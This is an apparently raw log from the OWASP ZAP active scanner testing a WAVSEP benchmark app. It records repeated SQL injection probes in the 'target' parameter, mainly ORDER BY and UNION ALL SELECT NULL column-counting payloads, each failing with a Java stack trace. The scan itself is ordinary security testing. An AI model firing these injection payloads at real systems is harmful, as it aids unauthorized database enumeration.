org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922620 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922621 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922622 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1019-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1019-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922623 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922624 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922625 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922626 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922627 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922629 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922631 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922631 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922632 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922634 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 